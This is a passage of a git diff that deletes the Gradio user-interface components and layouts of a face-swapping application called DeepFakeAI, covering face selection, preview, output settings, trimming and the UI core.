REFERENCE_FACE_POSITION_GALLERY - global REFERENCE_FACE_DISTANCE_SLIDER - - with gradio.Box(): - reference_face_gallery_args: Dict[str, Any] = { - 'label': wording.get('reference_face_gallery_label'), - 'height': 120, - 'object_fit': 'cover', - 'columns': 10, - 'allow_preview': False, - 'visible': 'reference' in DeepFakeAI.globals.face_recognition - } - if is_image(DeepFakeAI.globals.target_path): - reference_frame = cv2.imread(DeepFakeAI.globals.target_path) - reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) - if is_video(DeepFakeAI.globals.target_path): - reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) - reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) - FACE_RECOGNITION_DROPDOWN = gradio.Dropdown( - label = wording.get('face_recognition_dropdown_label'), - choices = DeepFakeAI.choices.face_recognition, - value = DeepFakeAI.globals.face_recognition - ) - REFERENCE_FACE_POSITION_GALLERY = gradio.Gallery(**reference_face_gallery_args) - REFERENCE_FACE_DISTANCE_SLIDER = gradio.Slider( - label = wording.get('reference_face_distance_slider_label'), - value = DeepFakeAI.globals.reference_face_distance, - maximum = 3, - step = 0.05, - visible = 'reference' in DeepFakeAI.globals.face_recognition - ) - ui.register_component('face_recognition_dropdown', FACE_RECOGNITION_DROPDOWN) - ui.register_component('reference_face_position_gallery', REFERENCE_FACE_POSITION_GALLERY) - ui.register_component('reference_face_distance_slider', REFERENCE_FACE_DISTANCE_SLIDER) - - -def listen() -> None: - FACE_RECOGNITION_DROPDOWN.select(update_face_recognition, inputs = FACE_RECOGNITION_DROPDOWN, outputs = [ REFERENCE_FACE_POSITION_GALLERY, REFERENCE_FACE_DISTANCE_SLIDER ]) - REFERENCE_FACE_POSITION_GALLERY.select(clear_and_update_face_reference_position) - REFERENCE_FACE_DISTANCE_SLIDER.change(update_reference_face_distance, inputs = REFERENCE_FACE_DISTANCE_SLIDER) - update_component_names : List[ComponentName] =\ - [ - 'target_file', - 'preview_frame_slider' - ] - for component_name in update_component_names: - component = ui.get_component(component_name) - if component: - component.change(update_face_reference_position, outputs = REFERENCE_FACE_POSITION_GALLERY) - select_component_names : List[ComponentName] =\ - [ - 'face_analyser_direction_dropdown', - 'face_analyser_age_dropdown', - 'face_analyser_gender_dropdown' - ] - for component_name in select_component_names: - component = ui.get_component(component_name) - if component: - component.select(update_face_reference_position, outputs = REFERENCE_FACE_POSITION_GALLERY) - - -def update_face_recognition(face_recognition : FaceRecognition) -> Tuple[Update, Update]: - if face_recognition == 'reference': - DeepFakeAI.globals.face_recognition = face_recognition - return gradio.update(visible = True), gradio.update(visible = True) - if face_recognition == 'many': - DeepFakeAI.globals.face_recognition = face_recognition - return gradio.update(visible = False), gradio.update(visible = False) - - -def clear_and_update_face_reference_position(event: gradio.SelectData) -> Update: - clear_face_reference() - return update_face_reference_position(event.index) - - -def update_face_reference_position(reference_face_position : int = 0) -> Update: - sleep(0.2) - gallery_frames = [] - DeepFakeAI.globals.reference_face_position = reference_face_position - if is_image(DeepFakeAI.globals.target_path): - reference_frame = cv2.imread(DeepFakeAI.globals.target_path) - gallery_frames = extract_gallery_frames(reference_frame) - if is_video(DeepFakeAI.globals.target_path): - reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) - gallery_frames = extract_gallery_frames(reference_frame) - if gallery_frames: - return gradio.update(value = gallery_frames) - return gradio.update(value = None) - - -def update_reference_face_distance(reference_face_distance : float) -> Update: - DeepFakeAI.globals.reference_face_distance = reference_face_distance - return gradio.update(value = reference_face_distance) - - -def extract_gallery_frames(reference_frame : Frame) -> List[Frame]: - crop_frames = [] - faces = get_many_faces(reference_frame) - for face in faces: - start_x, start_y, end_x, end_y = map(int, face['bbox']) - padding_x = int((end_x - start_x) * 0.25) - padding_y = int((end_y - start_y) * 0.25) - start_x = max(0, start_x - padding_x) - start_y = max(0, start_y - padding_y) - end_x = max(0, end_x + padding_x) - end_y = max(0, end_y + padding_y) - crop_frame = reference_frame[start_y:end_y, start_x:end_x] - crop_frames.append(ui.normalize_frame(crop_frame)) - return crop_frames diff --git a/DeepFakeAI/uis/components/output.py b/DeepFakeAI/uis/components/output.py deleted file mode 100644 index f2f1736e9b6b6e9b394cbdfd635b87a570fa6f72..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/output.py +++ /dev/null @@ -1,55 +0,0 @@ -from typing import Tuple, Optional -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.core import conditional_process -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import is_image, is_video, normalize_output_path, clear_temp - -OUTPUT_START_BUTTON : Optional[gradio.Button] = None -OUTPUT_CLEAR_BUTTON : Optional[gradio.Button] = None -OUTPUT_IMAGE : Optional[gradio.Image] = None -OUTPUT_VIDEO : Optional[gradio.Video] = None - - -def render() -> None: - global OUTPUT_START_BUTTON - global OUTPUT_CLEAR_BUTTON - global OUTPUT_IMAGE - global OUTPUT_VIDEO - - with gradio.Row(): - with gradio.Box(): - OUTPUT_IMAGE = gradio.Image( - label = wording.get('output_image_or_video_label'), - visible = False - ) - OUTPUT_VIDEO = gradio.Video( - label = wording.get('output_image_or_video_label') - ) - with gradio.Row(): - OUTPUT_START_BUTTON = gradio.Button(wording.get('start_button_label')) - OUTPUT_CLEAR_BUTTON = gradio.Button(wording.get('clear_button_label')) - - -def listen() -> None: - OUTPUT_START_BUTTON.click(update, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO ]) - OUTPUT_CLEAR_BUTTON.click(clear, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO ]) - - -def update() -> Tuple[Update, Update]: - DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, '.') - if DeepFakeAI.globals.output_path: - conditional_process() - if is_image(DeepFakeAI.globals.output_path): - return gradio.update(value = DeepFakeAI.globals.output_path, visible = True), gradio.update(value = None, visible = False) - if is_video(DeepFakeAI.globals.output_path): - return gradio.update(value = None, visible = False), gradio.update(value = DeepFakeAI.globals.output_path, visible = True) - return gradio.update(value = None, visible = False), gradio.update(value = None, visible = False) - - -def clear() -> Tuple[Update, Update]: - if DeepFakeAI.globals.target_path: - clear_temp(DeepFakeAI.globals.target_path) - return gradio.update(value = None), gradio.update(value = None) diff --git a/DeepFakeAI/uis/components/output_settings.py b/DeepFakeAI/uis/components/output_settings.py deleted file mode 100644 index 4146cd955361fe738525c50b033054a6ae1b3a82..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/output_settings.py +++ /dev/null @@ -1,43 +0,0 @@ -from typing import Optional -import gradio - -import DeepFakeAI.choices -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.typing import OutputVideoEncoder -from DeepFakeAI.uis.typing import Update - -OUTPUT_VIDEO_ENCODER_DROPDOWN : Optional[gradio.Dropdown] = None -OUTPUT_VIDEO_QUALITY_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global OUTPUT_VIDEO_ENCODER_DROPDOWN - global OUTPUT_VIDEO_QUALITY_SLIDER - - with gradio.Box(): - OUTPUT_VIDEO_ENCODER_DROPDOWN = gradio.Dropdown( - label = wording.get('output_video_encoder_dropdown_label'), - choices = DeepFakeAI.choices.output_video_encoder, - value = DeepFakeAI.globals.output_video_encoder - ) - OUTPUT_VIDEO_QUALITY_SLIDER = gradio.Slider( - label = wording.get('output_video_quality_slider_label'), - value = DeepFakeAI.globals.output_video_quality, - step = 1 - ) - - -def listen() -> None: - OUTPUT_VIDEO_ENCODER_DROPDOWN.select(update_output_video_encoder, inputs = OUTPUT_VIDEO_ENCODER_DROPDOWN, outputs = OUTPUT_VIDEO_ENCODER_DROPDOWN) - OUTPUT_VIDEO_QUALITY_SLIDER.change(update_output_video_quality, inputs = OUTPUT_VIDEO_QUALITY_SLIDER, outputs = OUTPUT_VIDEO_QUALITY_SLIDER) - - -def update_output_video_encoder(output_video_encoder: OutputVideoEncoder) -> Update: - DeepFakeAI.globals.output_video_encoder = output_video_encoder - return gradio.update(value = output_video_encoder) - - -def update_output_video_quality(output_video_quality : int) -> Update: - DeepFakeAI.globals.output_video_quality = output_video_quality - return gradio.update(value = output_video_quality) diff --git a/DeepFakeAI/uis/components/preview.py b/DeepFakeAI/uis/components/preview.py deleted file mode 100644 index f86acaacc7f83c814d73b29186e019e97034a45e..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/preview.py +++ /dev/null @@ -1,121 +0,0 @@ -from time import sleep -from typing import Any, Dict, Tuple, List, Optional -import cv2 -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.capturer import get_video_frame, get_video_frame_total -from DeepFakeAI.face_analyser import get_one_face -from DeepFakeAI.face_reference import get_face_reference, set_face_reference -from DeepFakeAI.predictor import predict_frame -from DeepFakeAI.processors.frame.core import load_frame_processor_module -from DeepFakeAI.typing import Frame -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import ComponentName, Update -from DeepFakeAI.utilities import is_video, is_image - -PREVIEW_IMAGE : Optional[gradio.Image] = None -PREVIEW_FRAME_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global PREVIEW_IMAGE - global PREVIEW_FRAME_SLIDER - - with gradio.Box(): - preview_image_args: Dict[str, Any] = { - 'label': wording.get('preview_image_label') - } - preview_frame_slider_args: Dict[str, Any] = { - 'label': wording.get('preview_frame_slider_label'), - 'step': 1, - 'visible': False - } - if is_image(DeepFakeAI.globals.target_path): - target_frame = cv2.imread(DeepFakeAI.globals.target_path) - preview_frame = extract_preview_frame(target_frame) - preview_image_args['value'] = ui.normalize_frame(preview_frame) - if is_video(DeepFakeAI.globals.target_path): - temp_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) - preview_frame = extract_preview_frame(temp_frame) - preview_image_args['value'] = ui.normalize_frame(preview_frame) - preview_image_args['visible'] = True - preview_frame_slider_args['value'] = DeepFakeAI.globals.reference_frame_number - preview_frame_slider_args['maximum'] = get_video_frame_total(DeepFakeAI.globals.target_path) - preview_frame_slider_args['visible'] = True - PREVIEW_IMAGE = gradio.Image(**preview_image_args) - PREVIEW_FRAME_SLIDER = gradio.Slider(**preview_frame_slider_args) - ui.register_component('preview_frame_slider', PREVIEW_FRAME_SLIDER) - - -def listen() -> None: - PREVIEW_FRAME_SLIDER.change(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) - update_component_names : List[ComponentName] =\ - [ - 'source_file', - 'target_file', - 'face_recognition_dropdown', - 'reference_face_distance_slider', - 'frame_processors_checkbox_group' - ] - for component_name in update_component_names: - component = ui.get_component(component_name) - if component: - component.change(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) - select_component_names : List[ComponentName] =\ - [ - 'reference_face_position_gallery', - 'face_analyser_direction_dropdown', - 'face_analyser_age_dropdown', - 'face_analyser_gender_dropdown' - ] - for component_name in select_component_names: - component = ui.get_component(component_name) - if component: - component.select(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) - - -def update(frame_number : int = 0) -> Tuple[Update, Update]: - sleep(0.1) - if is_image(DeepFakeAI.globals.target_path): - target_frame = cv2.imread(DeepFakeAI.globals.target_path) - preview_frame = extract_preview_frame(target_frame) - return gradio.update(value = ui.normalize_frame(preview_frame)), gradio.update(value = None, maximum = None, visible = False) - if is_video(DeepFakeAI.globals.target_path): - DeepFakeAI.globals.reference_frame_number = frame_number - video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) - temp_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) - preview_frame = extract_preview_frame(temp_frame) - return gradio.update(value = ui.normalize_frame(preview_frame)), gradio.update(maximum = video_frame_total, visible = True) - return gradio.update(value = None), gradio.update(value = None, maximum = None, visible = False) - - -def extract_preview_frame(temp_frame : Frame) -> Frame: - if predict_frame(temp_frame): - return cv2.GaussianBlur(temp_frame, (99, 99), 0) - source_face = get_one_face(cv2.imread(DeepFakeAI.globals.source_path)) if DeepFakeAI.globals.source_path else None - temp_frame = reduce_preview_frame(temp_frame) - if 'reference' in DeepFakeAI.globals.face_recognition and not get_face_reference(): - reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) - reference_face = get_one_face(reference_frame, DeepFakeAI.globals.reference_face_position) - set_face_reference(reference_face) - reference_face = get_face_reference() if 'reference' in DeepFakeAI.globals.face_recognition else None - for frame_processor in DeepFakeAI.globals.frame_processors: - frame_processor_module = load_frame_processor_module(frame_processor) - if frame_processor_module.pre_process(): - temp_frame = frame_processor_module.process_frame( - source_face, - reference_face, - temp_frame - ) - return temp_frame - - -def reduce_preview_frame(temp_frame : Frame, max_height : int = 480) -> Frame: - height, width = temp_frame.shape[:2] - if height > max_height: - scale = max_height / height - max_width = int(width * scale) - temp_frame = cv2.resize(temp_frame, (max_width, max_height)) - return temp_frame diff --git a/DeepFakeAI/uis/components/processors.py b/DeepFakeAI/uis/components/processors.py deleted file mode 100644 index b87da139b019f6c51a1adc45ad65a09f4578aa66..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/processors.py +++ /dev/null @@ -1,41 +0,0 @@ -from typing import List, Optional -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.processors.frame.core import load_frame_processor_module, clear_frame_processors_modules -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import list_module_names - -FRAME_PROCESSORS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None - - -def render() -> None: - global FRAME_PROCESSORS_CHECKBOX_GROUP - - with gradio.Box(): - FRAME_PROCESSORS_CHECKBOX_GROUP = gradio.CheckboxGroup( - label = wording.get('frame_processors_checkbox_group_label'), - choices = sort_frame_processors(DeepFakeAI.globals.frame_processors), - value = DeepFakeAI.globals.frame_processors - ) - ui.register_component('frame_processors_checkbox_group', FRAME_PROCESSORS_CHECKBOX_GROUP) - - -def listen() -> None: - FRAME_PROCESSORS_CHECKBOX_GROUP.change(update_frame_processors, inputs = FRAME_PROCESSORS_CHECKBOX_GROUP, outputs = FRAME_PROCESSORS_CHECKBOX_GROUP) - - -def update_frame_processors(frame_processors : List[str]) -> Update: - clear_frame_processors_modules() - DeepFakeAI.globals.frame_processors = frame_processors - for frame_processor in DeepFakeAI.globals.frame_processors: - frame_processor_module = load_frame_processor_module(frame_processor) - frame_processor_module.pre_check() - return gradio.update(value = frame_processors, choices = sort_frame_processors(frame_processors)) - - -def sort_frame_processors(frame_processors : List[str]) -> list[str]: - frame_processors_names = list_module_names('DeepFakeAI/processors/frame/modules') - return sorted(frame_processors_names, key = lambda frame_processor : frame_processors.index(frame_processor) if frame_processor in frame_processors else len(frame_processors)) diff --git a/DeepFakeAI/uis/components/settings.py b/DeepFakeAI/uis/components/settings.py deleted file mode 100644 index ec5c30b023f0ea5563a58dbaa5ea993a53ffba86..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/settings.py +++ /dev/null @@ -1,41 +0,0 @@ -from typing import Optional -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.uis.typing import Update - -KEEP_FPS_CHECKBOX : Optional[gradio.Checkbox] = None -KEEP_TEMP_CHECKBOX : Optional[gradio.Checkbox] = None -SKIP_AUDIO_CHECKBOX : Optional[gradio.Checkbox] = None - - -def render() -> None: - global KEEP_FPS_CHECKBOX - global KEEP_TEMP_CHECKBOX - global SKIP_AUDIO_CHECKBOX - - with gradio.Box(): - KEEP_FPS_CHECKBOX = gradio.Checkbox( - label = wording.get('keep_fps_checkbox_label'), - value = DeepFakeAI.globals.keep_fps - ) - KEEP_TEMP_CHECKBOX = gradio.Checkbox( - label = wording.get('keep_temp_checkbox_label'), - value = DeepFakeAI.globals.keep_temp - ) - SKIP_AUDIO_CHECKBOX = gradio.Checkbox( - label = wording.get('skip_audio_checkbox_label'), - value = DeepFakeAI.globals.skip_audio - ) - - -def listen() -> None: - KEEP_FPS_CHECKBOX.change(lambda value: update_checkbox('keep_fps', value), inputs = KEEP_FPS_CHECKBOX, outputs = KEEP_FPS_CHECKBOX) - KEEP_TEMP_CHECKBOX.change(lambda value: update_checkbox('keep_temp', value), inputs = KEEP_TEMP_CHECKBOX, outputs = KEEP_TEMP_CHECKBOX) - SKIP_AUDIO_CHECKBOX.change(lambda value: update_checkbox('skip_audio', value), inputs = SKIP_AUDIO_CHECKBOX, outputs = SKIP_AUDIO_CHECKBOX) - - -def update_checkbox(name : str, value: bool) -> Update: - setattr(DeepFakeAI.globals, name, value) - return gradio.update(value = value) diff --git a/DeepFakeAI/uis/components/source.py b/DeepFakeAI/uis/components/source.py deleted file mode 100644 index 29b77715b0648d49761a466bb9374dd7c32c4150..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/source.py +++ /dev/null @@ -1,48 +0,0 @@ -from typing import Any, IO, Optional -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import is_image - -SOURCE_FILE : Optional[gradio.File] = None -SOURCE_IMAGE : Optional[gradio.Image] = None - - -def render() -> None: - global SOURCE_FILE - global SOURCE_IMAGE - - with gradio.Box(): - is_source_image = is_image(DeepFakeAI.globals.source_path) - SOURCE_FILE = gradio.File( - file_count = 'single', - file_types= - [ - '.png', - '.jpg', - '.webp' - ], - label = wording.get('source_file_label'), - value = DeepFakeAI.globals.source_path if is_source_image else None - ) - ui.register_component('source_file', SOURCE_FILE) - SOURCE_IMAGE = gradio.Image( - value = SOURCE_FILE.value['name'] if is_source_image else None, - visible = is_source_image, - show_label = False - ) - - -def listen() -> None: - SOURCE_FILE.change(update, inputs = SOURCE_FILE, outputs = SOURCE_IMAGE) - - -def update(file: IO[Any]) -> Update: - if file and is_image(file.name): - DeepFakeAI.globals.source_path = file.name - return gradio.update(value = file.name, visible = True) - DeepFakeAI.globals.source_path = None - return gradio.update(value = None, visible = False) diff --git a/DeepFakeAI/uis/components/target.py b/DeepFakeAI/uis/components/target.py deleted file mode 100644 index 022cd8da664e0555e79f61bb875ffca47f98589e..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/target.py +++ /dev/null @@ -1,62 +0,0 @@ -from typing import Any, IO, Tuple, Optional -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.face_reference import clear_face_reference -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import is_image, is_video - -TARGET_FILE : Optional[gradio.File] = None -TARGET_IMAGE : Optional[gradio.Image] = None -TARGET_VIDEO : Optional[gradio.Video] = None - - -def render() -> None: - global TARGET_FILE - global TARGET_IMAGE - global TARGET_VIDEO - - with gradio.Box(): - is_target_image = is_image(DeepFakeAI.globals.target_path) - is_target_video = is_video(DeepFakeAI.globals.target_path) - TARGET_FILE = gradio.File( - label = wording.get('target_file_label'), - file_count = 'single', - file_types = - [ - '.png', - '.jpg', - '.webp', - '.mp4' - ], - value = DeepFakeAI.globals.target_path if is_target_image or is_target_video else None - ) - TARGET_IMAGE = gradio.Image( - value = TARGET_FILE.value['name'] if is_target_image else None, - visible = is_target_image, - show_label = False - ) - TARGET_VIDEO = gradio.Video( - value = TARGET_FILE.value['name'] if is_target_video else None, - visible = is_target_video, - show_label = False - ) - ui.register_component('target_file', TARGET_FILE) - - -def listen() -> None: - TARGET_FILE.change(update, inputs = TARGET_FILE, outputs = [ TARGET_IMAGE, TARGET_VIDEO ]) - - -def update(file : IO[Any]) -> Tuple[Update, Update]: - clear_face_reference() - if file and is_image(file.name): - DeepFakeAI.globals.target_path = file.name - return gradio.update(value = file.name, visible = True), gradio.update(value = None, visible = False) - if file and is_video(file.name): - DeepFakeAI.globals.target_path = file.name - return gradio.update(value = None, visible = False), gradio.update(value = file.name, visible = True) - DeepFakeAI.globals.target_path = None - return gradio.update(value = None, visible = False), gradio.update(value = None, visible = False) diff --git a/DeepFakeAI/uis/components/temp_frame.py b/DeepFakeAI/uis/components/temp_frame.py deleted file mode 100644 index e1236f787144a8f87b8809c862f790f2abe5186c..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/temp_frame.py +++ /dev/null @@ -1,44 +0,0 @@ -from typing import Optional -import gradio - -import DeepFakeAI.choices -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.typing import TempFrameFormat - -from DeepFakeAI.uis.typing import Update - -TEMP_FRAME_FORMAT_DROPDOWN : Optional[gradio.Dropdown] = None -TEMP_FRAME_QUALITY_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global TEMP_FRAME_FORMAT_DROPDOWN - global TEMP_FRAME_QUALITY_SLIDER - - with gradio.Box(): - TEMP_FRAME_FORMAT_DROPDOWN = gradio.Dropdown( - label = wording.get('temp_frame_format_dropdown_label'), - choices = DeepFakeAI.choices.temp_frame_format, - value = DeepFakeAI.globals.temp_frame_format - ) - TEMP_FRAME_QUALITY_SLIDER = gradio.Slider( - label = wording.get('temp_frame_quality_slider_label'), - value = DeepFakeAI.globals.temp_frame_quality, - step = 1 - ) - - -def listen() -> None: - TEMP_FRAME_FORMAT_DROPDOWN.select(update_temp_frame_format, inputs = TEMP_FRAME_FORMAT_DROPDOWN, outputs = TEMP_FRAME_FORMAT_DROPDOWN) - TEMP_FRAME_QUALITY_SLIDER.change(update_temp_frame_quality, inputs = TEMP_FRAME_QUALITY_SLIDER, outputs = TEMP_FRAME_QUALITY_SLIDER) - - -def update_temp_frame_format(temp_frame_format : TempFrameFormat) -> Update: - DeepFakeAI.globals.temp_frame_format = temp_frame_format - return gradio.update(value = temp_frame_format) - - -def update_temp_frame_quality(temp_frame_quality : int) -> Update: - DeepFakeAI.globals.temp_frame_quality = temp_frame_quality - return gradio.update(value = temp_frame_quality) diff --git a/DeepFakeAI/uis/components/trim_frame.py b/DeepFakeAI/uis/components/trim_frame.py deleted file mode 100644 index cf95f81e36e32ebcd7acbdfd4e15fb78618ce0c3..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/trim_frame.py +++ /dev/null @@ -1,65 +0,0 @@ -from time import sleep -from typing import Any, Dict, Tuple, Optional - -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.capturer import get_video_frame_total -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import is_video - -TRIM_FRAME_START_SLIDER : Optional[gradio.Slider] = None -TRIM_FRAME_END_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global TRIM_FRAME_START_SLIDER - global TRIM_FRAME_END_SLIDER - - with gradio.Box(): - trim_frame_start_slider_args : Dict[str, Any] = { - 'label': wording.get('trim_frame_start_slider_label'), - 'step': 1, - 'visible': False - } - trim_frame_end_slider_args : Dict[str, Any] = { - 'label': wording.get('trim_frame_end_slider_label'), - 'step': 1, - 'visible': False - } - if is_video(DeepFakeAI.globals.target_path): - video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) - trim_frame_start_slider_args['value'] = DeepFakeAI.globals.trim_frame_start or 0 - trim_frame_start_slider_args['maximum'] = video_frame_total - trim_frame_start_slider_args['visible'] = True - trim_frame_end_slider_args['value'] = DeepFakeAI.globals.trim_frame_end or video_frame_total - trim_frame_end_slider_args['maximum'] = video_frame_total - trim_frame_end_slider_args['visible'] = True - with gradio.Row(): - TRIM_FRAME_START_SLIDER = gradio.Slider(**trim_frame_start_slider_args) - TRIM_FRAME_END_SLIDER = gradio.Slider(**trim_frame_end_slider_args) - - -def listen() -> None: - target_file = ui.get_component('target_file') - if target_file: - target_file.change(remote_update, outputs = [ TRIM_FRAME_START_SLIDER, TRIM_FRAME_END_SLIDER ]) - TRIM_FRAME_START_SLIDER.change(lambda value : update_number('trim_frame_start', int(value)), inputs = TRIM_FRAME_START_SLIDER, outputs = TRIM_FRAME_START_SLIDER) - TRIM_FRAME_END_SLIDER.change(lambda value : update_number('trim_frame_end', int(value)), inputs = TRIM_FRAME_END_SLIDER, outputs = TRIM_FRAME_END_SLIDER) - - -def remote_update() -> Tuple[Update, Update]: - sleep(0.1) - if is_video(DeepFakeAI.globals.target_path): - video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) - DeepFakeAI.globals.trim_frame_start = 0 - DeepFakeAI.globals.trim_frame_end = video_frame_total - return gradio.update(value = 0, maximum = video_frame_total, visible = True), gradio.update(value = video_frame_total, maximum = video_frame_total, visible = True) - return gradio.update(value = None, maximum = None, visible = False), gradio.update(value = None, maximum = None, visible = False) - - -def update_number(name : str, value : int) -> Update: - setattr(DeepFakeAI.globals, name, value) - return gradio.update(value = value) diff --git a/DeepFakeAI/uis/core.py b/DeepFakeAI/uis/core.py deleted file mode 100644 index 8db45e59b4fd981bc9e0866d1ccc135475219b68..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/core.py +++ /dev/null @@ -1,67 +0,0 @@ -from typing import Dict, Optional, Any -import importlib -import sys -import cv2 -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import metadata, wording -from DeepFakeAI.typing import Frame -from DeepFakeAI.uis.typing import Component, ComponentName - -COMPONENTS: Dict[ComponentName, Component] = {} -UI_LAYOUT_METHODS =\ -[ - 'pre_check', - 'render', - 'listen' -] - - -def launch() -> None: - with gradio.Blocks(theme = get_theme(), title = metadata.get('name') + ' ' + metadata.get('version')) as ui: - for ui_layout in DeepFakeAI.globals.ui_layouts: - ui_layout_module = load_ui_layout_module(ui_layout) - ui_layout_module.pre_check() - ui_layout_module.render() - ui_layout_module.listen() - ui.launch(debug=True, show_api=True) - - -def load_ui_layout_module(ui_layout : str) -> Any: - try: - ui_layout_module = importlib.import_module('DeepFakeAI.uis.layouts.' + ui_layout) - for method_name in UI_LAYOUT_METHODS: - if not hasattr(ui_layout_module, method_name): - raise NotImplementedError - except ModuleNotFoundError: - sys.exit(wording.get('ui_layout_not_loaded').format(ui_layout = ui_layout)) - except NotImplementedError: - sys.exit(wording.get('ui_layout_not_implemented').format(ui_layout = ui_layout)) - return ui_layout_module - - -def get_theme() -> gradio.Theme: - return gradio.themes.Soft( - primary_hue = gradio.themes.colors.red, - secondary_hue = gradio.themes.colors.gray, - font = gradio.themes.GoogleFont('Inter') - ).set( - background_fill_primary = '*neutral_50', - block_label_text_size = '*text_sm', - block_title_text_size = '*text_sm' - ) - - -def get_component(name: ComponentName) -> Optional[Component]: - if name in COMPONENTS: - return COMPONENTS[name] - return None - - -def register_component(name: ComponentName, component: Component) -> None: - COMPONENTS[name] = component - - -def normalize_frame(frame : Frame) -> Frame: - return cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) diff --git a/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc b/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc deleted file mode 100644 index 89ffca297f794b12dd76d9df628cfb2e9d0e2730..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/uis/layouts/__pycache__/default.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/uis/layouts/benchmark.py b/DeepFakeAI/uis/layouts/benchmark.py deleted file mode 100644 index f58e47a7a0dc5b681fa78a0276df1b482c8c532d..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/layouts/benchmark.py +++ /dev/null @@ -1,37 +0,0 @@ -import gradio - -from DeepFakeAI.uis.components import about, processors, execution, benchmark -from DeepFakeAI.utilities import conditional_download - - -def pre_check() -> bool: - conditional_download('.assets/examples', - [ - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/source.jpg', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-240p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-360p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-540p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-720p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-1080p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-1440p.mp4', - 'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-2160p.mp4' - ]) - return True - - -def render() -> gradio.Blocks: - with gradio.Blocks() as layout: - with gradio.Row(): - with gradio.Column(scale = 2): - about.render() - processors.render() - execution.render() - with gradio.Column(scale= 5): - benchmark.render() - return layout - - -def listen() -> None: - processors.listen() - execution.listen() - benchmark.listen() diff --git a/DeepFakeAI/uis/layouts/default.py b/DeepFakeAI/uis/layouts/default.py deleted file mode 100644 index 250e56c7f68f375dd8eb9dac69320aeb1723cce1..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/layouts/default.py +++ /dev/null @@ -1,44 +0,0 @@ -import gradio - -from DeepFakeAI.uis.components import about, processors, execution, temp_frame, settings, source, target, preview, trim_frame, face_analyser, face_selector, output_settings, output - - -def pre_check() -> bool: - return True - - -def render() -> gradio.Blocks: - with gradio.Blocks() as layout: - with gradio.Row(): - with gradio.Column(scale = 2): - about.render() - processors.render() - execution.render() - temp_frame.render() - settings.render() - with gradio.Column(scale = 2): - source.render() - target.render() - output_settings.render() - output.render() - with gradio.Column(scale = 3): - #preview.render() - trim_frame.render() - face_selector.render() - face_analyser.render() - return layout - - -def listen() -> None: - processors.listen() - 